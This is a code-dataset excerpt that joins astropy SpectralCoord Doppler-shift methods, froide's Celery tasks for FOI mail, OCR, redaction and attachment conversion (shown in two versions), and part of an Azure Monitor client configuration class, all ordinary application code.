# Reset any that are 0 to 1 to avoid nans from 0/0
dp_norm[dp_norm == 0] = 1 * dp_norm.unit
pos_hat = d_pos / dp_norm
return pos_hat
@u.quantity_input(velocity=u.km/u.s)
def with_observer_stationary_relative_to(self, frame, velocity=None, preserve_observer_frame=False):
if self.observer is None or self.target is None:
raise ValueError("This method can only be used if both observer "
"and target are defined on the SpectralCoord.")
# Start off by extracting frame if a SkyCoord was passed in
if isinstance(frame, SkyCoord):
frame = frame.frame
if isinstance(frame, BaseCoordinateFrame):
if not frame.has_data:
frame = frame.realize_frame(CartesianRepresentation(0 * u.km, 0 * u.km, 0 * u.km))
if frame.data.differentials:
if velocity is not None:
raise ValueError('frame already has differentials, cannot also specify velocity')
# otherwise frame is ready to go
else:
if velocity is None:
differentials = ZERO_VELOCITIES
else:
differentials = CartesianDifferential(velocity)
frame = frame.realize_frame(frame.data.with_differentials(differentials))
if isinstance(frame, (type, str)):
if isinstance(frame, type):
frame_cls = frame
elif isinstance(frame, str):
frame_cls = frame_transform_graph.lookup_name(frame)
if velocity is None:
velocity = 0 * u.m / u.s, 0 * u.m / u.s, 0 * u.m / u.s
elif velocity.shape != (3,):
raise ValueError('velocity should be a Quantity vector with 3 elements')
frame = frame_cls(0 * u.m, 0 * u.m, 0 * u.m,
*velocity,
representation_type='cartesian',
differential_type='cartesian')
observer = update_differentials_to_match(self.observer, frame,
preserve_observer_frame=preserve_observer_frame)
# Calculate the initial and final los velocity
init_obs_vel = self._calculate_radial_velocity(self.observer, self.target, as_scalar=True)
fin_obs_vel = self._calculate_radial_velocity(observer, self.target, as_scalar=True)
# Apply transformation to data
new_data = _apply_relativistic_doppler_shift(self, fin_obs_vel - init_obs_vel)
new_coord = self.replicate(value=new_data, observer=observer)
return new_coord
def with_radial_velocity_shift(self, target_shift=None, observer_shift=None):
if observer_shift is not None and (self.target is None or
self.observer is None):
raise ValueError("Both an observer and target must be defined "
"before applying a velocity shift.")
for arg in [x for x in [target_shift, observer_shift] if x is not None]:
if isinstance(arg, u.Quantity) and not arg.unit.is_equivalent((u.one, KMS)):
raise u.UnitsError("Argument must have unit physical type "
"'speed' for radial velocty or "
"'dimensionless' for redshift.")
# The target or observer value is defined but is not a quantity object,
# assume it's a redshift float value and convert to velocity
if target_shift is None:
if self._observer is None or self._target is None:
return self.replicate()
target_shift = 0 * KMS
else:
target_shift = u.Quantity(target_shift)
if target_shift.unit.physical_type == 'dimensionless':
target_shift = _redshift_to_velocity(target_shift)
if self._observer is None or self._target is None:
return self.replicate(value=_apply_relativistic_doppler_shift(self, target_shift),
radial_velocity=self.radial_velocity + target_shift)
if observer_shift is None:
observer_shift = 0 * KMS
else:
observer_shift = u.Quantity(observer_shift)
if observer_shift.unit.physical_type == 'dimensionless':
observer_shift = _redshift_to_velocity(observer_shift)
target_icrs = self._target.transform_to(ICRS())
observer_icrs = self._observer.transform_to(ICRS())
pos_hat = SpectralCoord._normalized_position_vector(observer_icrs, target_icrs)
target_velocity = _get_velocities(target_icrs) + target_shift * pos_hat
observer_velocity = _get_velocities(observer_icrs) + observer_shift * pos_hat
target_velocity = CartesianDifferential(target_velocity.xyz)
observer_velocity = CartesianDifferential(observer_velocity.xyz)
new_target = (target_icrs
.realize_frame(target_icrs.cartesian.with_differentials(target_velocity))
.transform_to(self._target))
new_observer = (observer_icrs
.realize_frame(observer_icrs.cartesian.with_differentials(observer_velocity))
.transform_to(self._observer))
init_obs_vel = self._calculate_radial_velocity(observer_icrs, target_icrs, as_scalar=True)
fin_obs_vel = self._calculate_radial_velocity(new_observer, new_target, as_scalar=True)
new_data = _apply_relativistic_doppler_shift(self, fin_obs_vel - init_obs_vel)
return self.replicate(value=new_data,
observer=new_observer,
target=new_target)
def to_rest(self):
if self.observer is not None and self.target is not None:
return self.with_observer_stationary_relative_to(self.target)
result = _apply_relativistic_doppler_shift(self, -self.radial_velocity)
return self.replicate(value=result, radial_velocity=0. * KMS, redshift=None)
def __repr__(self):
prefixstr = '<' + self.__class__.__name__ + ' '
try:
radial_velocity = self.radial_velocity
redshift = self.redshift
except ValueError:
radial_velocity = redshift = 'Undefined'
repr_items = [f'{prefixstr}']
if self.observer is not None:
observer_repr = indent(repr(self.observer), 14 * ' ').lstrip()
repr_items.append(f' observer: {observer_repr}')
if self.target is not None:
target_repr = indent(repr(self.target), 12 * ' ').lstrip()
repr_items.append(f' target: {target_repr}')
if (self._observer is not None and self._target is not None) or self._radial_velocity is not None:
if self.observer is not None and self.target is not None:
repr_items.append(' observer to target (computed from above):')
else:
repr_items.append(' observer to target:')
repr_items.append(f' radial_velocity={radial_velocity}')
repr_items.append(f' redshift={redshift}')
if self.doppler_rest is not None or self.doppler_convention is not None:
repr_items.append(f' doppler_rest={self.doppler_rest}')
repr_items.append(f' doppler_convention={self.doppler_convention}')
arrstr = np.array2string(self.view(np.ndarray), separator=', ',
prefix=' ')
if len(repr_items) == 1:
repr_items[0] += f'{arrstr}{self._unitstr:s}'
else:
repr_items[1] = ' (' + repr_items[1].lstrip()
repr_items[-1] += ')'
repr_items.append(f' {arrstr}{self._unitstr:s}')
return '\n'.join(repr_items) + '>'
| true | true |
7900fd9108cca2e41cb7dd605cf195436c3aef24 | 10,134 | py | Python | froide/foirequest/tasks.py | MrKrisKrisu/froide | d4ae1daeab617bcb1b60630c437f6d5c2bfe3a70 | [
"MIT"
] | null | null | null | froide/foirequest/tasks.py | MrKrisKrisu/froide | d4ae1daeab617bcb1b60630c437f6d5c2bfe3a70 | [
"MIT"
] | null | null | null | froide/foirequest/tasks.py | MrKrisKrisu/froide | d4ae1daeab617bcb1b60630c437f6d5c2bfe3a70 | [
"MIT"
] | null | null | null | import os
import logging
from django.conf import settings
from django.utils import translation
from django.utils.translation import gettext_lazy as _
from django.db import transaction
from django.core.files.base import ContentFile
from celery.exceptions import SoftTimeLimitExceeded
from froide.celery import app as celery_app
from froide.publicbody.models import PublicBody
from froide.upload.models import Upload
from .models import FoiRequest, FoiMessage, FoiAttachment, FoiProject
from .foi_mail import _process_mail, _fetch_mail
from .notifications import send_classification_reminder
logger = logging.getLogger(__name__)
@celery_app.task(
    name="froide.foirequest.tasks.process_mail", acks_late=True, time_limit=60
)
def process_mail(*args, **kwargs):
    """Process one fetched raw e-mail into FOI request messages.

    All arguments are passed straight through to ``_process_mail``. Runs
    inside a single database transaction so a failing mail leaves no
    partial state.
    """
    # Activate the default language so strings generated while processing
    # use the site's configured locale rather than a worker default.
    translation.activate(settings.LANGUAGE_CODE)
    with transaction.atomic():
        _process_mail(*args, **kwargs)
@celery_app.task(name="froide.foirequest.tasks.fetch_mail", expires=60)
def fetch_mail():
    """Fetch new mail from the inbox and fan each message out to process_mail."""
    for uid, raw_message in _fetch_mail():
        process_mail.delay(raw_message, mail_uid=uid)
@celery_app.task
def detect_overdue():
    """Mark every request whose response deadline has passed as overdue."""
    translation.activate(settings.LANGUAGE_CODE)
    for request in FoiRequest.objects.get_to_be_overdue():
        request.set_overdue()
@celery_app.task
def detect_asleep():
    """Put requests without recent activity to sleep."""
    translation.activate(settings.LANGUAGE_CODE)
    for request in FoiRequest.objects.get_to_be_asleep():
        request.set_asleep()
@celery_app.task
def classification_reminder():
    """Send a reminder for every request that still lacks a classification."""
    translation.activate(settings.LANGUAGE_CODE)
    for request in FoiRequest.objects.get_unclassified():
        send_classification_reminder(request)
@celery_app.task
def check_delivery_status(message_id, count=None, extended=False):
    """Check and record the delivery status of one sent message."""
    message = FoiMessage.objects.filter(id=message_id).first()
    if message is None:
        # Message was deleted before the task ran; nothing to check.
        return
    message.check_delivery_status(count=count, extended=extended)
@celery_app.task
def create_project_requests(project_id, publicbody_ids, **kwargs):
    """Fan out one create_project_request task per public body, in order."""
    for sequence, publicbody_id in enumerate(publicbody_ids):
        create_project_request.delay(
            project_id, publicbody_id, sequence=sequence, **kwargs
        )
@celery_app.task
def create_project_request(project_id, publicbody_id, sequence=0, **kwargs):
    """Create one FOI request of a project, addressed to one public body.

    Extra keyword arguments are forwarded to the request creation service.
    Returns the new request's primary key, or ``None`` if the project or
    public body has been deleted in the meantime.
    """
    from .services import CreateRequestFromProjectService

    try:
        project = FoiProject.objects.get(id=project_id)
    except FoiProject.DoesNotExist:
        # Project was removed before the task ran; nothing to do.
        return
    try:
        publicbody = PublicBody.objects.get(id=publicbody_id)
    except PublicBody.DoesNotExist:
        # Public body was removed before the task ran; nothing to do.
        return

    request_data = kwargs
    request_data.update(
        {
            "project": project,
            "publicbody": publicbody,
            "subject": project.title,
            "user": project.user,
            "body": project.description,
            "public": project.public,
            "reference": project.reference,
            "tags": [tag.name for tag in project.tags.all()],
            "project_order": sequence,
        }
    )
    foirequest = CreateRequestFromProjectService(request_data).execute()

    # Once the last request of the project exists, flag the project as ready.
    if project.request_count == project.foirequest_set.all().count():
        project.status = FoiProject.STATUS_READY
        project.save()
    return foirequest.pk
@celery_app.task(name="froide.foirequest.tasks.convert_attachment_task", time_limit=60)
def convert_attachment_task(instance_id):
    """Convert the given attachment to PDF if its file type supports it."""
    attachment = FoiAttachment.objects.filter(pk=instance_id).first()
    if attachment is None:
        # Attachment vanished before the task ran; nothing to convert.
        return
    if attachment.can_convert_to_pdf():
        return convert_attachment(attachment)
def ocr_pdf_attachment(att):
    """Schedule OCR for a PDF attachment into a companion '*_ocr.pdf' file.

    Reuses the existing converted attachment if one is already linked,
    otherwise creates a fresh placeholder attachment; then queues the
    actual OCR work in ``ocr_pdf_task``.
    """
    if att.converted:
        ocred_att = att.converted
    else:
        name, ext = os.path.splitext(att.name)
        name = _("{name}_ocr{ext}").format(name=name, ext=".pdf")
        ocred_att = FoiAttachment.objects.create(
            name=name,
            belongs_to=att.belongs_to,
            approved=False,
            filetype="application/pdf",
            is_converted=True,
            can_approve=att.can_approve,
        )
    # The OCRed file supersedes the original for approval purposes.
    att.converted = ocred_att
    att.can_approve = False
    att.approved = False
    att.save()
    ocr_pdf_task.delay(
        att.pk,
        ocred_att.pk,
    )
def convert_attachment(att):
    """Convert an attachment's file to PDF and store it as a linked attachment.

    Uses the document conversion binary/call configured in FROIDE_CONFIG.
    Does nothing if conversion yields no output. The converted attachment
    supersedes the original for approval purposes.
    """
    from filingcabinet.pdf_utils import convert_to_pdf
    output_bytes = convert_to_pdf(
        att.file.path,
        binary_name=settings.FROIDE_CONFIG.get("doc_conversion_binary"),
        construct_call=settings.FROIDE_CONFIG.get("doc_conversion_call_func"),
    )
    if output_bytes is None:
        # Conversion failed or produced nothing; keep the original as-is.
        return
    if att.converted:
        # Re-use the previously linked converted attachment.
        new_att = att.converted
    else:
        name, ext = os.path.splitext(att.name)
        name = _("{name}_converted{ext}").format(name=name, ext=".pdf")
        new_att = FoiAttachment(
            name=name,
            belongs_to=att.belongs_to,
            approved=False,
            filetype="application/pdf",
            is_converted=True,
            can_approve=att.can_approve,
        )
    new_file = ContentFile(output_bytes)
    new_att.size = new_file.size
    new_att.file.save(new_att.name, new_file)
    new_att.save()
    # Link the PDF and disable approval of the unconverted original.
    att.converted = new_att
    att.can_approve = False
    att.approved = False
    att.save()
@celery_app.task(
    name="froide.foirequest.tasks.convert_images_to_pdf_task",
    time_limit=60 * 5,
    soft_time_limit=60 * 4,
)
def convert_images_to_pdf_task(att_ids, target_id, instructions, can_approve=True):
    """Combine several image attachments into one OCRed PDF attachment.

    ``att_ids`` gives the page order; ``target_id`` is the pre-created
    attachment that receives the resulting PDF. On failure (including the
    soft time limit) the target is deleted and the source attachments'
    ``can_approve`` flag is restored.
    """
    from filingcabinet.pdf_utils import convert_images_to_ocred_pdf
    att_qs = FoiAttachment.objects.filter(id__in=att_ids)
    # Re-order the queryset results to match the page order in att_ids.
    att_map = {a.id: a for a in att_qs}
    atts = [att_map[a_id] for a_id in att_ids]
    try:
        target = FoiAttachment.objects.get(id=target_id)
    except FoiAttachment.DoesNotExist:
        return
    paths = [a.file.path for a in atts]
    try:
        pdf_bytes = convert_images_to_ocred_pdf(paths, instructions=instructions)
    except SoftTimeLimitExceeded:
        pdf_bytes = None
    if pdf_bytes is None:
        # Conversion failed: restore source flags and drop the empty target.
        att_qs.update(can_approve=can_approve)
        target.delete()
        return
    new_file = ContentFile(pdf_bytes)
    target.size = new_file.size
    target.file.save(target.name, new_file)
    target.save()
@celery_app.task(
    name="froide.foirequest.tasks.ocr_pdf_task",
    time_limit=60 * 5,
    soft_time_limit=60 * 4,
)
def ocr_pdf_task(att_id, target_id, can_approve=True):
    """Run OCR on an attachment's PDF and store the result in the target.

    On failure (including the soft time limit) the source attachment's
    ``can_approve`` flag is restored and the target placeholder is deleted.
    """
    from filingcabinet.pdf_utils import run_ocr
    try:
        attachment = FoiAttachment.objects.get(pk=att_id)
    except FoiAttachment.DoesNotExist:
        return
    try:
        target = FoiAttachment.objects.get(pk=target_id)
    except FoiAttachment.DoesNotExist:
        return
    try:
        pdf_bytes = run_ocr(
            attachment.file.path,
            # Prefer the dedicated Tesseract language, falling back to the
            # site's language code.
            language=settings.TESSERACT_LANGUAGE
            if settings.TESSERACT_LANGUAGE
            else settings.LANGUAGE_CODE,
            timeout=180,
        )
    except SoftTimeLimitExceeded:
        pdf_bytes = None
    if pdf_bytes is None:
        # OCR failed: restore the source flag and drop the empty target.
        attachment.can_approve = can_approve
        attachment.save()
        target.delete()
        return
    new_file = ContentFile(pdf_bytes)
    target.size = new_file.size
    target.file.save(target.name, new_file)
    target.save()
@celery_app.task(
    name="froide.foirequest.tasks.redact_attachment_task",
    time_limit=60 * 6,
    soft_time_limit=60 * 5,
)
def redact_attachment_task(att_id, target_id, instructions):
    """Redact an attachment's PDF per ``instructions``, OCR it, and publish.

    When ``att_id == target_id`` the attachment is redacted in place,
    otherwise the result is written to the separate target attachment.
    A redaction failure aborts and cleans up; an OCR failure still
    publishes the redacted (but un-OCRed) PDF.
    """
    from filingcabinet.pdf_utils import run_ocr
    from froide.helper.redaction import redact_file
    try:
        attachment = FoiAttachment.objects.get(pk=att_id)
    except FoiAttachment.DoesNotExist:
        return
    if att_id != target_id:
        try:
            target = FoiAttachment.objects.get(pk=target_id)
        except FoiAttachment.DoesNotExist:
            return
    else:
        # In-place redaction: source and target are the same attachment.
        target = attachment
    logger.info("Trying redaction of %s", attachment.id)
    try:
        pdf_bytes = redact_file(attachment.file, instructions)
    except Exception:
        logger.error("PDF redaction error", exc_info=True)
        pdf_bytes = None
    if pdf_bytes is None:
        logger.info("Redaction failed %s", attachment.id)
        # Redaction has failed: unlink and remove the empty target
        # attachment and make the source approvable again.
        if attachment.redacted:
            attachment.redacted = None
        if attachment.is_redacted:
            attachment.approved = True
            attachment.can_approve = True
        attachment.pending = False
        attachment.save()
        if not target.file:
            target.delete()
        return
    logger.info("Redaction successful %s", attachment.id)
    pdf_file = ContentFile(pdf_bytes)
    target.size = pdf_file.size
    # save=False: the model row is persisted later by approve_and_save().
    target.file.save(target.name, pdf_file, save=False)
    logger.info("Trying OCR %s", target.id)
    try:
        pdf_bytes = run_ocr(
            target.file.path,
            language=settings.TESSERACT_LANGUAGE
            if settings.TESSERACT_LANGUAGE
            else settings.LANGUAGE_CODE,
            timeout=60 * 4,
        )
    except SoftTimeLimitExceeded:
        pdf_bytes = None
    if pdf_bytes is not None:
        logger.info("OCR successful %s", target.id)
        # Replace the redacted PDF with its OCRed version.
        pdf_file = ContentFile(pdf_bytes)
        target.size = pdf_file.size
        target.file.save(target.name, pdf_file, save=False)
    else:
        # OCR failure is non-fatal: publish the redacted PDF without text.
        logger.info("OCR failed %s", target.id)
    target.can_approve = True
    target.pending = False
    target.approve_and_save()
    FoiAttachment.attachment_published.send(sender=target, user=None)
@celery_app.task(name="froide.foirequest.tasks.move_upload_to_attachment")
def move_upload_to_attachment(att_id, upload_id):
    """Move a finished upload's file onto its attachment, then clean up.

    Silently ignores attachments or uploads that were deleted before the
    task ran. After the file is stored, the upload is finished and removed
    and a PDF conversion is scheduled if the attachment supports it.
    """
    try:
        att = FoiAttachment.objects.get(pk=att_id)
    except FoiAttachment.DoesNotExist:
        return
    try:
        upload = Upload.objects.get(pk=upload_id)
    except Upload.DoesNotExist:
        # Bug fix: this previously caught FoiAttachment.DoesNotExist, so a
        # missing Upload raised an unhandled Upload.DoesNotExist instead of
        # being ignored (DoesNotExist is declared per model in Django).
        return
    file = upload.get_file()
    if file:
        att.pending = False
        att.file.save(att.name, file, save=True)
    upload.finish()
    upload.delete()
    # NOTE(review): conversion is scheduled even when no file was stored;
    # presumably can_convert_to_pdf() is False for a file-less attachment —
    # confirm against its implementation.
    if att.can_convert_to_pdf():
        convert_attachment_task.delay(att.id)
| 28.307263 | 87 | 0.677719 | import os
import logging
from django.conf import settings
from django.utils import translation
from django.utils.translation import gettext_lazy as _
from django.db import transaction
from django.core.files.base import ContentFile
from celery.exceptions import SoftTimeLimitExceeded
from froide.celery import app as celery_app
from froide.publicbody.models import PublicBody
from froide.upload.models import Upload
from .models import FoiRequest, FoiMessage, FoiAttachment, FoiProject
from .foi_mail import _process_mail, _fetch_mail
from .notifications import send_classification_reminder
logger = logging.getLogger(__name__)
@celery_app.task(
name="froide.foirequest.tasks.process_mail", acks_late=True, time_limit=60
)
def process_mail(*args, **kwargs):
translation.activate(settings.LANGUAGE_CODE)
with transaction.atomic():
_process_mail(*args, **kwargs)
@celery_app.task(name="froide.foirequest.tasks.fetch_mail", expires=60)
def fetch_mail():
for mail_uid, rfc_data in _fetch_mail():
process_mail.delay(rfc_data, mail_uid=mail_uid)
@celery_app.task
def detect_overdue():
translation.activate(settings.LANGUAGE_CODE)
for foirequest in FoiRequest.objects.get_to_be_overdue():
foirequest.set_overdue()
@celery_app.task
def detect_asleep():
translation.activate(settings.LANGUAGE_CODE)
for foirequest in FoiRequest.objects.get_to_be_asleep():
foirequest.set_asleep()
@celery_app.task
def classification_reminder():
translation.activate(settings.LANGUAGE_CODE)
for foirequest in FoiRequest.objects.get_unclassified():
send_classification_reminder(foirequest)
@celery_app.task
def check_delivery_status(message_id, count=None, extended=False):
try:
message = FoiMessage.objects.get(id=message_id)
except FoiMessage.DoesNotExist:
return
message.check_delivery_status(count=count, extended=extended)
@celery_app.task
def create_project_requests(project_id, publicbody_ids, **kwargs):
for seq, pb_id in enumerate(publicbody_ids):
create_project_request.delay(project_id, pb_id, sequence=seq, **kwargs)
@celery_app.task
def create_project_request(project_id, publicbody_id, sequence=0, **kwargs):
from .services import CreateRequestFromProjectService
try:
project = FoiProject.objects.get(id=project_id)
except FoiProject.DoesNotExist:
return
try:
pb = PublicBody.objects.get(id=publicbody_id)
except PublicBody.DoesNotExist:
return
kwargs.update(
{
"project": project,
"publicbody": pb,
"subject": project.title,
"user": project.user,
"body": project.description,
"public": project.public,
"reference": project.reference,
"tags": [t.name for t in project.tags.all()],
"project_order": sequence,
}
)
service = CreateRequestFromProjectService(kwargs)
foirequest = service.execute()
if project.request_count == project.foirequest_set.all().count():
project.status = FoiProject.STATUS_READY
project.save()
return foirequest.pk
@celery_app.task(name="froide.foirequest.tasks.convert_attachment_task", time_limit=60)
def convert_attachment_task(instance_id):
try:
att = FoiAttachment.objects.get(pk=instance_id)
except FoiAttachment.DoesNotExist:
return
if att.can_convert_to_pdf():
return convert_attachment(att)
def ocr_pdf_attachment(att):
if att.converted:
ocred_att = att.converted
else:
name, ext = os.path.splitext(att.name)
name = _("{name}_ocr{ext}").format(name=name, ext=".pdf")
ocred_att = FoiAttachment.objects.create(
name=name,
belongs_to=att.belongs_to,
approved=False,
filetype="application/pdf",
is_converted=True,
can_approve=att.can_approve,
)
att.converted = ocred_att
att.can_approve = False
att.approved = False
att.save()
ocr_pdf_task.delay(
att.pk,
ocred_att.pk,
)
def convert_attachment(att):
from filingcabinet.pdf_utils import convert_to_pdf
output_bytes = convert_to_pdf(
att.file.path,
binary_name=settings.FROIDE_CONFIG.get("doc_conversion_binary"),
construct_call=settings.FROIDE_CONFIG.get("doc_conversion_call_func"),
)
if output_bytes is None:
return
if att.converted:
new_att = att.converted
else:
name, ext = os.path.splitext(att.name)
name = _("{name}_converted{ext}").format(name=name, ext=".pdf")
new_att = FoiAttachment(
name=name,
belongs_to=att.belongs_to,
approved=False,
filetype="application/pdf",
is_converted=True,
can_approve=att.can_approve,
)
new_file = ContentFile(output_bytes)
new_att.size = new_file.size
new_att.file.save(new_att.name, new_file)
new_att.save()
att.converted = new_att
att.can_approve = False
att.approved = False
att.save()
@celery_app.task(
name="froide.foirequest.tasks.convert_images_to_pdf_task",
time_limit=60 * 5,
soft_time_limit=60 * 4,
)
def convert_images_to_pdf_task(att_ids, target_id, instructions, can_approve=True):
from filingcabinet.pdf_utils import convert_images_to_ocred_pdf
att_qs = FoiAttachment.objects.filter(id__in=att_ids)
att_map = {a.id: a for a in att_qs}
atts = [att_map[a_id] for a_id in att_ids]
try:
target = FoiAttachment.objects.get(id=target_id)
except FoiAttachment.DoesNotExist:
return
paths = [a.file.path for a in atts]
try:
pdf_bytes = convert_images_to_ocred_pdf(paths, instructions=instructions)
except SoftTimeLimitExceeded:
pdf_bytes = None
if pdf_bytes is None:
att_qs.update(can_approve=can_approve)
target.delete()
return
new_file = ContentFile(pdf_bytes)
target.size = new_file.size
target.file.save(target.name, new_file)
target.save()
@celery_app.task(
name="froide.foirequest.tasks.ocr_pdf_task",
time_limit=60 * 5,
soft_time_limit=60 * 4,
)
def ocr_pdf_task(att_id, target_id, can_approve=True):
from filingcabinet.pdf_utils import run_ocr
try:
attachment = FoiAttachment.objects.get(pk=att_id)
except FoiAttachment.DoesNotExist:
return
try:
target = FoiAttachment.objects.get(pk=target_id)
except FoiAttachment.DoesNotExist:
return
try:
pdf_bytes = run_ocr(
attachment.file.path,
language=settings.TESSERACT_LANGUAGE
if settings.TESSERACT_LANGUAGE
else settings.LANGUAGE_CODE,
timeout=180,
)
except SoftTimeLimitExceeded:
pdf_bytes = None
if pdf_bytes is None:
attachment.can_approve = can_approve
attachment.save()
target.delete()
return
new_file = ContentFile(pdf_bytes)
target.size = new_file.size
target.file.save(target.name, new_file)
target.save()
@celery_app.task(
    name="froide.foirequest.tasks.redact_attachment_task",
    time_limit=60 * 6,
    soft_time_limit=60 * 5,
)
def redact_attachment_task(att_id, target_id, instructions):
    """Redact a PDF attachment, then OCR and publish the redacted result.

    Celery task. Applies the redaction ``instructions`` to attachment
    ``att_id`` and stores the outcome on attachment ``target_id`` (which
    may be the same attachment). The redacted PDF is OCRed afterwards; if
    OCR fails the un-OCRed redacted PDF is kept. The target is approved
    and an attachment_published signal is sent on success.
    """
    from filingcabinet.pdf_utils import run_ocr
    from froide.helper.redaction import redact_file
    try:
        attachment = FoiAttachment.objects.get(pk=att_id)
    except FoiAttachment.DoesNotExist:
        return
    # In-place redaction uses the source attachment itself as target.
    if att_id != target_id:
        try:
            target = FoiAttachment.objects.get(pk=target_id)
        except FoiAttachment.DoesNotExist:
            return
    else:
        target = attachment
    logger.info("Trying redaction of %s", attachment.id)
    try:
        pdf_bytes = redact_file(attachment.file, instructions)
    except Exception:
        logger.error("PDF redaction error", exc_info=True)
        pdf_bytes = None
    if pdf_bytes is None:
        # Redaction failed: detach any redaction link, re-approve the
        # original where applicable and drop an empty target stub.
        logger.info("Redaction failed %s", attachment.id)
        if attachment.redacted:
            attachment.redacted = None
        if attachment.is_redacted:
            attachment.approved = True
            attachment.can_approve = True
        attachment.pending = False
        attachment.save()
        if not target.file:
            target.delete()
        return
    logger.info("Redaction successful %s", attachment.id)
    pdf_file = ContentFile(pdf_bytes)
    target.size = pdf_file.size
    # save=False: the model row is persisted later via approve_and_save().
    target.file.save(target.name, pdf_file, save=False)
    logger.info("Trying OCR %s", target.id)
    try:
        pdf_bytes = run_ocr(
            target.file.path,
            language=settings.TESSERACT_LANGUAGE
            if settings.TESSERACT_LANGUAGE
            else settings.LANGUAGE_CODE,
            timeout=60 * 4,
        )
    except SoftTimeLimitExceeded:
        pdf_bytes = None
    if pdf_bytes is not None:
        logger.info("OCR successful %s", target.id)
        pdf_file = ContentFile(pdf_bytes)
        target.size = pdf_file.size
        target.file.save(target.name, pdf_file, save=False)
    else:
        # Keep the redacted (but un-OCRed) PDF if OCR did not finish.
        logger.info("OCR failed %s", target.id)
    target.can_approve = True
    target.pending = False
    target.approve_and_save()
    FoiAttachment.attachment_published.send(sender=target, user=None)
@celery_app.task(name="froide.foirequest.tasks.move_upload_to_attachment")
def move_upload_to_attachment(att_id, upload_id):
    """Attach a finished upload's file to its pending FoiAttachment.

    Celery task. Saves the uploaded file on the attachment, finalizes and
    deletes the Upload record and queues PDF conversion when the
    attachment is convertible. Silently returns when either record has
    vanished in the meantime.

    Args:
        att_id: pk of the FoiAttachment that should receive the file.
        upload_id: pk of the Upload holding the uploaded data.
    """
    try:
        att = FoiAttachment.objects.get(pk=att_id)
    except FoiAttachment.DoesNotExist:
        return
    try:
        upload = Upload.objects.get(pk=upload_id)
    except Upload.DoesNotExist:
        # BUGFIX: this previously caught FoiAttachment.DoesNotExist, so a
        # missing Upload escaped as an unhandled exception instead of
        # being ignored like the missing-attachment case above.
        return
    uploaded_file = upload.get_file()
    if uploaded_file:
        att.pending = False
        att.file.save(att.name, uploaded_file, save=True)
    upload.finish()
    upload.delete()
    if att.can_convert_to_pdf():
        convert_attachment_task.delay(att.id)
| true | true |
7900fda1d54a3129f2b7595b084a6fd4e7ad0f06 | 1,092 | py | Python | LeetCode/318 Maximum Product of Word Lengths.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | LeetCode/318 Maximum Product of Word Lengths.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | LeetCode/318 Maximum Product of Word Lengths.py | gesuwen/Algorithms | 0c9cf4412d76f8b69ef68cc80636323f5a0e5786 | [
"MIT"
] | null | null | null | # Bit Manipulation
# Given a string array words, find the maximum value of length(word[i]) * length(word[j]) where the two words do not share common letters. You may assume that each word will contain only lower case letters. If no such two words exist, return 0.
#
# Example 1:
#
# Input: ["abcw","baz","foo","bar","xtfn","abcdef"]
# Output: 16
# Explanation: The two words can be "abcw", "xtfn".
# Example 2:
#
# Input: ["a","ab","abc","d","cd","bcd","abcd"]
# Output: 4
# Explanation: The two words can be "ab", "cd".
# Example 3:
#
# Input: ["a","aa","aaa","aaaa"]
# Output: 0
# Explanation: No such pair of words.
class Solution:
    def maxProduct(self, words):
        """Return the maximum length(words[i]) * length(words[j]) over pairs
        of words that share no common letters, or 0 if no such pair exists.

        Uses the intended bit-manipulation approach: each word is reduced
        to a 26-bit mask of its letters, so the disjointness test per pair
        is a single AND instead of a set intersection. Only the longest
        word per mask is kept, shrinking the quadratic pair scan.

        :type words: List[str]
        :rtype: int
        """
        # mask -> length of the longest word having exactly these letters
        best_len_by_mask = {}
        for word in words:
            mask = 0
            for ch in word:
                mask |= 1 << (ord(ch) - ord('a'))
            if best_len_by_mask.get(mask, 0) < len(word):
                best_len_by_mask[mask] = len(word)
        output = 0
        masks = list(best_len_by_mask.items())
        for i, (mask_a, len_a) in enumerate(masks):
            for mask_b, len_b in masks[i + 1:]:
                # No shared letters iff the masks are bitwise disjoint.
                if mask_a & mask_b == 0:
                    output = max(output, len_a * len_b)
        return output
| 29.513514 | 244 | 0.581502 |
class Solution:
def maxProduct(self, words):
wordsDict = {}
for word in words:
wordsDict[word] = set(word)
output = 0
for i in range(len(words)):
for j in range(i+1, len(words)):
if not wordsDict[words[i]]&wordsDict[words[j]]:
output = max(output, len(words[i])*len(words[j]))
return output
| true | true |
7900fde3b236c293a428fb7d8f1bd6f8f0e0fcee | 2,945 | py | Python | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/_configuration.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | 8 | 2021-01-13T23:44:08.000Z | 2021-03-17T10:13:36.000Z | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/_configuration.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | 2 | 2020-03-03T23:11:13.000Z | 2020-03-30T18:50:55.000Z | sdk/monitor/azure-mgmt-monitor/azure/mgmt/monitor/v2017_05_01_preview/_configuration.py | vbarbaresi/azure-sdk-for-python | 397ba46c51d001ff89c66b170f5576cf8f49c05f | [
"MIT"
] | null | null | null | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
from azure.core.configuration import Configuration
from azure.core.pipeline import policies
from azure.mgmt.core.policies import ARMHttpLoggingPolicy
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any
from azure.core.credentials import TokenCredential
VERSION = "unknown"
class MonitorClientConfiguration(Configuration):
    """Configuration for MonitorClient.

    Note that all parameters used to create this instance are saved as instance
    attributes.

    :param credential: Credential needed for the client to connect to Azure.
    :type credential: ~azure.core.credentials.TokenCredential
    """

    def __init__(
        self,
        credential,  # type: "TokenCredential"
        **kwargs  # type: Any
    ):
        # type: (...) -> None
        if credential is None:
            raise ValueError("Parameter 'credential' must not be None.")
        super(MonitorClientConfiguration, self).__init__(**kwargs)
        self.credential = credential
        # API version is pinned by the generated client and not overridable.
        self.api_version = "2017-05-01-preview"
        # Default to the ARM scope unless the caller supplies custom scopes.
        self.credential_scopes = kwargs.pop('credential_scopes', ['https://management.azure.com/.default'])
